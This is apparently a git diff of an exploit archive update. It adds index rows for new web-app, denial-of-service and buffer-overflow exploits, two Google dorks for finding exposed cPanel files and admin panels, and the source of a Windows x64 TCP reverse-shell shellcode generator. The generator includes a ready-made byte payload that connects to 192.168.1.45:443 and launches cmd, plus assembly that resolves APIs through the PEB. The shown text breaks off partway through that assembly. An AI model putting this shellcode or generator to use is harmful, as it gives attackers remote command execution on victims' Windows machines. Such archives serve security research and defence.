Inclusion",2009-09-10,"EA Ngel",webapps,php,,2009-09-09,,1,OSVDB-61856;CVE-2009-4622,,,,, 3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php,,2007-01-26,2016-09-27,1,OSVDB-36619;CVE-2007-0572,,,,http://www.exploit-db.comdrunkengolem_alpha2.zip, +51723,exploits/php/webapps/51723.txt,"Drupal 10.1.2 - web-cache-poisoning-External-service-interaction",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,, 21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php,,2002-09-25,2012-10-09,1,CVE-2002-1806;OSVDB-59300,,,,,https://www.securityfocus.com/bid/5801/info 22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php,,2003-07-21,2012-11-27,1,,,,,,https://www.securityfocus.com/bid/8235/info 1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php,,2005-07-04,2016-05-25,1,OSVDB-17647;CVE-2005-2106,,,,http://www.exploit-db.comdrupal-4.5.3.zip, @@ -21962,6 +21965,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 6955,exploits/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,webapps,php,,2008-11-01,,1,OSVDB-49511;CVE-2008-6269,,,,, 45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80,2018-09-06,2018-09-11,1,CVE-2018-15918,"SQL Injection (SQLi)",,http://www.exploit-db.com/screenshots/idlt45500/45340.png,, 45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80,2018-09-06,2018-09-06,0,CVE-2018-15917,"Cross-Site Scripting (XSS)",,,, +51715,exploits/php/webapps/51715.txt,"Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,, 39128,exploits/php/webapps/39128.txt,"Jorjweb - 'id' SQL Injection",2014-02-21,"Vulnerability Laboratory",webapps,php,,2014-02-21,2015-12-29,1,OSVDB-104937,,,,,https://www.securityfocus.com/bid/66377/info 8752,exploits/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,webapps,php,,2009-05-19,,1,OSVDB-61537,,,,, 5091,exploits/php/webapps/5091.pl,"Journalness 4.1 - 'last_module' Remote Code Execution",2008-02-09,Iron,webapps,php,,2008-02-08,2016-11-14,1,OSVDB-40596;CVE-2007-5056,,,,http://www.exploit-db.comJournalness_4.1_Full.tar.gz, @@ -30003,6 +30007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3457,exploits/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,webapps,php,,2007-03-10,,1,OSVDB-33986;CVE-2007-1425,,,,, 36196,exploits/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,webapps,php,,2011-10-02,2015-02-27,1,CVE-2011-5169;OSVDB-76185,,,,,https://www.securityfocus.com/bid/49906/info 2216,exploits/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - 'folder' Include",2006-08-18,"Philipp Niedziela",webapps,php,,2006-08-17,,1,OSVDB-28033;CVE-2006-4311,,,,, +51718,exploits/php/webapps/51718.txt,"soosyze 2.0.0 - File Upload",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,, 41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,php,,2017-02-21,2017-07-18,1,CVE-2016-9553,,,,, 40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,webapps,php,,2016-11-07,2016-11-07,1,,,,,, 42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,webapps,php,,2017-05-16,2017-07-18,1,CVE-2017-6412,,,,, @@ -30024,6 +30029,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80,2018-10-30,2018-10-30,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsouthgateinn_0.zip, 11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-12,,1,,,,,, 51713,exploits/php/webapps/51713.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4547,,,,, +51714,exploits/php/webapps/51714.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection",2023-09-08,CraCkEr,webapps,php,,2023-09-08,2023-09-08,0,CVE-2023-4548,,,,, 12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php,,2010-05-25,,1,,,,,, 12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,webapps,php,,2010-05-09,,1,,,,,, 12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,webapps,php,,2010-05-25,,1,,,,,, @@ -32927,6 +32933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38019,exploits/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",webapps,php,,2012-11-09,2015-08-30,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56479/info 17284,exploits/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,webapps,php,,2011-05-14,2011-05-14,0,,"WordPress Plugin",,,http://www.exploit-db.comeditormonkey.tar.gz, 20270,exploits/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",webapps,php,,2012-08-05,2012-08-05,0,OSVDB-84462,"WordPress Plugin",,,, +51716,exploits/php/webapps/51716.txt,"Wordpress Plugin Elementor 3.5.5 - Iframe Injection",2023-09-08,"Miguel Santareno",webapps,php,,2023-09-08,2023-09-08,0,CVE-2022-4953,,,,, 50882,exploits/php/webapps/50882.py,"WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)",2022-04-19,AkuCyberSec,webapps,php,,2022-04-19,2022-04-22,0,,,,,, 37356,exploits/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure",2012-06-07,"Sammy FORGIT",webapps,php,,2012-06-07,2015-06-24,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53850/info 43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,,2018-01-24,2018-01-24,1,,,,,http://www.exploit-db.comemail-subscribers.3.4.7.zip, @@ -33913,6 +33920,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,, 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,, 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,, +51717,exploits/php/webapps/51717.py,"Wp2Fac - OS Command Injection",2023-09-08,"Ahmet Ümit BAYRAM",webapps,php,,2023-09-08,2023-09-08,0,,,,,, 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,, 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,, @@ -34680,7 +34688,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,, 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz, 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,, -51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,, +51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-09-08,1,,,,,, 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz, 51276,exploits/python/webapps/51276.go,"modoboa 2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,, @@ -38682,6 +38690,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,,2017-10-27,2018-03-02,0,,,,,, 43453,exploits/windows/dos/43453.py,"Sync Breeze Enterprise 10.1.16 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows,,2018-01-08,2018-01-08,0,CVE-2017-15664,,,,http://www.exploit-db.comsyncbreezesrv_setup_v10.1.16.exe, 44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,,2020-06-10,2020-06-10,0,,,,,, +51725,exploits/windows/dos/51725.py,"SyncBreeze 15.2.24 - 'login' Denial of Service",2023-09-08,"mohamed youssef",dos,windows,,2023-09-08,2023-09-08,0,,,,,, 41475,exploits/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",dos,windows,,2017-02-28,2017-02-28,0,CVE-2017-6371,,,,http://www.exploit-db.comsbbs316c.zip, 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,,2020-01-20,2020-01-20,0,,,,,, 24940,exploits/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",dos,windows,,2013-04-09,2013-04-09,1,OSVDB-92081,,,,http://www.exploit-db.comsysaxserv_setup_6.10.msi, @@ -40135,6 +40144,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 7702,exploits/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Local Stack Overflow",2009-01-08,DATA_SNIPER,local,windows,,2009-01-07,,1,,,,,http://www.exploit-db.comGOMPLAYERENSETUP_v2.0.12.EXE,http://secunia.com/advisories/23994 18174,exploits/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",local,windows,,2011-11-30,2011-11-30,1,CVE-2011-5162;OSVDB-33080;CVE-2007-0707,,,http://www.exploit-db.com/screenshots/idlt18500/18174.png,, 30154,exploits/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Local Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",local,windows,,2013-12-10,2013-12-10,1,CVE-2013-6356,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-10-at-64257-pm.png,, +51724,exploits/windows/local/51724.py,"GOM Player 2.3.90.5360 - Buffer Overflow (PoC)",2023-09-08,"Ahmet Ümit BAYRAM",local,windows,,2023-09-08,2023-09-08,0,,,,,, 14790,exploits/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows,,2010-08-25,2010-08-26,1,CVE-2010-3134;OSVDB-67539,,,,, 11152,exploits/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,local,windows,,2010-01-15,,1,,,,,http://www.exploit-db.comGoogleSketchUpWEN.exe,http://www.coresecurity.com/content/google-sketchup-vulnerability 963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows,,2005-04-27,,1,OSVDB-14686;CVE-2005-1424,,,,, @@ -42945,6 +42955,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 969,exploits/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,remote,windows,21,2005-04-28,2011-04-28,1,OSVDB-14369;CVE-2005-0634,,,,http://www.exploit-db.comGolden_FTP_Server_Pro_v2.50.zip, 16572,exploits/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-5779;OSVDB-38282,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/27418/ 4579,exploits/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,remote,windows,,2007-10-28,2016-10-20,1,OSVDB-38282;CVE-2007-5779,,,,http://www.exploit-db.comgom2163499.exe, +51719,exploits/windows/remote/51719.py,"GOM Player 2.3.90.5360 - Remote Code Execution (RCE)",2023-09-08,"M. Akil Gündoğan",remote,windows,,2023-09-08,2023-09-08,0,,,,,, 6804,exploits/windows/remote/6804.pl,"GoodTech SSH - 'SSH_FXP_OPEN' Remote Buffer Overflow",2008-10-22,r0ut3r,remote,windows,22,2008-10-21,,1,OSVDB-49249;CVE-2008-4726,,,,, 16817,exploits/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,2380,2010-05-09,2011-03-07,1,CVE-2005-0768;OSVDB-14806,"Metasploit Framework (MSF)",,,, 883,exploits/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,remote,windows,2380,2005-04-23,,1,,,,,, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 8882077c1..92132dd6a 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -933,6 +933,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,, 51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,, 51634,shellcodes/windows/51634.py,"Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)",2023-07-28,Senzee,,windows,169,2023-07-28,2023-07-28,0,,,,,, +51721,shellcodes/windows/51721.py,"Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)",2023-09-08,Senzee,,windows,476,2023-09-08,2023-09-08,0,,,,,, 13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php 13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php 13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php diff --git a/ghdb.xml b/ghdb.xml index ce745b3cd..1b3d476dc 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -37668,6 +37668,21 @@ stag_1 2021-11-05 Veeresh Appasaheb Patil + + 8223 + https://www.exploit-db.com/ghdb/8223 + Files Containing Juicy Info + index of cpanel.txt + # Google Dork: index of cpanel.txt +# Files Containing Juicy Info +# Date: 08/09/2023 +# Author: Ved Kolambkar + new google dork + https://www.google.com/search?q=new google dork + + 2023-09-08 + Ved Kolambkar + 7025 https://www.exploit-db.com/ghdb/7025 @@ -49339,6 +49354,21 @@ Maxime Westhoven 2019-10-18 Maxime Westhoven + + 8222 + https://www.exploit-db.com/ghdb/8222 + Files Containing Juicy Info + inurl:"/admin" intitle:"portfolio". + # Google Dork: inurl:"/admin" intitle:"portfolio". +# Files Containing Juicy Info +# Date: 08/09/2023 +# Exploit Jannatul Adnin + My name is Jannatul Adnin and I would like to report a new Google dork. + https://www.google.com/search?q=My name is Jannatul Adnin and I would like to report a new Google dork. + + 2023-09-08 + Jannatul Adnin + 8118 https://www.exploit-db.com/ghdb/8118 diff --git a/shellcodes/windows/51721.py b/shellcodes/windows/51721.py new file mode 100755 index 000000000..2609acff1 --- /dev/null +++ b/shellcodes/windows/51721.py @@ -0,0 +1,377 @@ +import ctypes, struct +import argparse +from keystone import * + +# Exploit Title: Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes) +# Exploit Author: Senzee +# Date: 08/29/2023 +# Platform: Windows X64 +# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter +# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763 +# Test IP: 192.168.1.45 +# Test Port: 443 +# Payload size: 476 bytes +# NUll-Free: True +# Detailed information can be found at https://github.com/senzee1984/micr0_shell + + + +# Generated Shellcode (192.168.1.45:443): +# Payload size: 476 bytes +# buf = b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d" +# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01" +# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01" +# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31" +# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45" +# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b" +# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x4c\x89\xcd\x41\xb8\x8e\x4e\x0e\xec\xe8\x8f\xff\xff" +# buf += b"\xff\x49\x89\xc4\x48\x31\xc0\x66\xb8\x6c\x6c\x50\x48\xb8\x57\x53\x32\x5f\x33\x32" +# buf += b"\x2e\x64\x50\x48\x89\xe1\x48\x83\xec\x20\x4c\x89\xe0\xff\xd0\x48\x83\xc4\x20\x49" +# buf += b"\x89\xc6\x49\x89\xc1\x41\xb8\xcb\xed\xfc\x3b\x4c\x89\xcb\xe8\x55\xff\xff\xff\x48" +# buf += b"\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec" +# buf += b"\x30\xff\xd0\x48\x83\xc4\x30\x49\x89\xd9\x41\xb8\xd9\x09\xf5\xad\xe8\x2b\xff\xff" +# buf += b"\xff\x48\x83\xec\x30\x48\x31\xc9\xb1\x02\x48\x31\xd2\xb2\x01\x4d\x31\xc0\x41\xb0" +# buf += b"\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd0\x49\x89\xc4\x48" +# buf += b"\x83\xc4\x30\x49\x89\xd9\x41\xb8\x0c\xba\x2d\xb3\xe8\xf3\xfe\xff\xff\x48\x83\xec" +# buf += b"\x20\x4c\x89\xe1\x48\x31\xd2\xb2\x02\x48\x89\x14\x24\x48\x31\xd2\x66\xba\x01\xbb" +# buf += b"\x48\x89\x54\x24\x02\xba\xc0\xa8\x01\x2d\x48\x89\x54\x24\x04\x48\x8d\x14\x24\x4d" +# buf += b"\x31\xc0\x41\xb0\x16\x4d\x31\xc9\x48\x83\xec\x38\x4c\x89\x4c\x24\x20\x4c\x89\x4c" +# buf += b"\x24\x28\x4c\x89\x4c\x24\x30\xff\xd0\x48\x83\xc4\x38\x49\x89\xe9\x41\xb8\x72\xfe" +# buf += b"\xb3\x16\xe8\x99\xfe\xff\xff\x48\xba\x9c\x92\x9b\xd1\x9a\x87\x9a\xff\x48\xf7\xd2" +# buf += b"\x52\x48\x89\xe2\x41\x54\x41\x54\x41\x54\x48\x31\xc9\x66\x51\x51\x51\xb1\xff\x66" +# buf += b"\xff\xc1\x66\x51\x48\x31\xc9\x66\x51\x66\x51\x51\x51\x51\x51\x51\x51\xb1\x68\x51" +# buf += b"\x48\x89\xe7\x48\x89\xe1\x48\x83\xe9\x20\x51\x57\x48\x31\xc9\x51\x51\x51\x48\xff" +# buf += b"\xc1\x51\xfe\xc9\x51\x51\x51\x51\x49\x89\xc8\x49\x89\xc9\xff\xd0" + + +def print_banner(): + banner=""" +███╗░░░███╗██╗░█████╗░██████╗░░█████╗░  ░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░ +████╗░████║██║██╔══██╗██╔══██╗██╔══██╗  ██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░ +██╔████╔██║██║██║░░╚═╝██████╔╝██║░░██║  ╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░ +██║╚██╔╝██║██║██║░░██╗██╔══██╗██║░░██║  ░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░ +██║░╚═╝░██║██║╚█████╔╝██║░░██║╚█████╔╝  ██████╔╝██║░░██║███████╗███████╗███████╗ +╚═╝░░░░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░  ╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝ +""" + print(banner) + print("Author: Senzee") + print("Original Github Repository: https://github.com/senzee1984/micr0_shell") + print("Description: Dynamically generate PIC Null-Free Windows X64 TCP Reverse Shell Shellcode") + print("This version does not support shellcode execution") + print("Attention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\n\n") + + +def get_port_argument(port): + port_hex_str = format(port, '04x') + port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2] + if "00" in {port_part_1, port_part_2}: + port += 257 + port_hex_str = format(port, '04x') + port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2] + return f"mov dx, 0x{port_part_1 + port_part_2};\nsub dx, 0x101;" + return f"mov dx, 0x{port_part_1 + port_part_2};" + + +def get_ip_argument(ip): + ip_hex_parts = [format(int(part), '02x') for part in ip.split('.')] + reversed_hex = ''.join(ip_hex_parts[::-1]) + if "00" in ip_hex_parts and "ff" not in ip_hex_parts: + hex_int = int(reversed_hex, 16) + neg_hex = (0xFFFFFFFF + 1 - hex_int) & 0xFFFFFFFF + return f"mov edx, 0x{neg_hex:08x};\nneg rdx;" + return f"mov edx, 0x{reversed_hex};" + + +def get_shell_type_argument(shell_type): + if shell_type == "cmd": + return f"mov rdx, 0xff9a879ad19b929c;\nnot rdx;" + return (f"sub rsp, 8;\nmov rdx, 0xffff9a879ad19393;\nnot rdx;\npush rdx;" + f"\nmov rdx, 0x6568737265776f70;") + + +def output_shellcode(lan,encoding,var,save): + sh = b"" + for e in encoding: + sh += struct.pack("B", e) + shellcode = bytearray(sh) + print("[+]Payload size: "+str(len(encoding))+" bytes\n") + counter=0 + + if lan=="python": + print("[+]Shellcode format for Python\n") + sc = "" + sc = var+" = b\"" + for dec in encoding: + if counter % 20 == 0 and counter != 0: + sc += "\"\n"+var+"+="+"b\"" + sc += "\\x{0:02x}".format(int(dec)) + counter += 1 + + if count % 20 > 0: + sc += "\"" + print(sc) + + elif lan=="c": + print("[+]Shellcode format for C\n") + sc = "unsigned char " + var + "[]={\n" + for dec in encoding: + if counter % 20 == 0 and counter != 0: + sc += "\n" + sc += "0x{0:02x}".format(int(dec))+"," + counter += 1 + sc=sc[0:len(sc)-1]+"};" + print(sc) + + + elif lan=="powershell": + print("[+]Shellcode format for Powershell\n") + sc = "[Byte[]] $"+var+" = " + for dec in encoding: + sc += "0x{0:02x}".format(int(dec))+"," + sc=sc[0:len(sc)-1] + print(sc) + + elif lan=="csharp": + print("[+]Shellcode format for C#\n") + sc = "byte[] " + var + "= new byte["+str(len(encoding))+"] {\n" + for dec in encoding: + if counter % 20 == 0 and counter != 0: + sc += "\n" + sc += "0x{0:02x}".format(int(dec))+"," + counter += 1 + sc=sc[0:len(sc)-1]+"};" + print(sc) + + else: + print("Unsupported language! Exiting...") + exit() + + + if save=="true": + try: + with open(output, 'wb') as f: + f.write(shellcode) + print("\n\nGenerated shellcode successfully saved in file "+output) + except Exception as e: + print(e) + + +if __name__ == "__main__": + print_banner() + parser = argparse.ArgumentParser(description='Dynamically generate Windows x64 reverse shell.') + parser.add_argument('--ip', '-i', required=True, dest='ip',help='The listening IP address, default value is 192.168.0.45') + parser.add_argument('--port', '-p', required=False, default=443, dest='port',help='The local listening port, default value is 443') + parser.add_argument('--language', '-l', required=False, default='python', dest='lan',help='The language of desired shellcode runner, default language is python. Support c, csharp, python, powershell') + parser.add_argument('--variable', '-v', required=False, default='buf', dest='var',help='The variable name of shellcode array, default variable is buf') + parser.add_argument('--type', '-t', required=False, default='cmd', dest='shell_type',help='The shell type, Powershell or Cmd, default shell is cmd') + parser.add_argument('--save', '-s', required=False, default='False', dest='save',help='Whether to save the generated shellcode to a bin file, True/False') + parser.add_argument('--output', '-o', required=False, default='', dest='output',help='If choose to save the shellcode to file, the desired location.') + + args = parser.parse_args() + ip=args.ip + port=int(args.port) + lan=args.lan.lower() + var=args.var + shell_type=args.shell_type.lower() + save=args.save.lower() + output=args.output + print("[+]Shellcode Settings:") + print("******** IP Address: "+ip) + print("******** Listening Port: "+str(port)) + print("******** Language of desired shellcode runner: "+lan) + print("******** Shellcode array variable name: "+var) + print("******** Shell: "+shell_type) + print("******** Save Shellcode to file: "+save+"\n\n") + + args = parser.parse_args() + port_argument = get_port_argument(port) + ip_argument = get_ip_argument(ip) + shell_type = get_shell_type_argument(shell_type) + + CODE = ( +"find_kernel32:" +" xor rdx, rdx;" +" mov rax, gs:[rdx+0x60];" # RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address +" mov rsi,[rax+0x18];" # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure +" mov rsi,[rsi + 0x30];" # RSI is the address of the InInitializationOrderModuleList member in the _PEB_LDR_DATA structure +" mov r9, [rsi];" # Current module is python.exe +" mov r9, [r9];" # Current module is ntdll.dll +" mov r9, [r9+0x10];" # Current module is kernel32.dll +" jmp jump_section;" + +"parse_module:" # Parsing DLL file in memory +" mov ecx, dword ptr [r9 + 0x3c];" # R9 stores the base address of the module, get the NT header offset +" xor r15, r15;" +" mov r15b, 0x88;" # Offset to Export Directory +" add r15, r9;" +" add r15, rcx;" +" mov r15d, dword ptr [r15];" # Get the RVA of the export directory +" add r15, r9;" # R14 stores the VMA of the export directory +" mov ecx, dword ptr [r15 + 0x18];" # ECX stores the number of function names as an index value 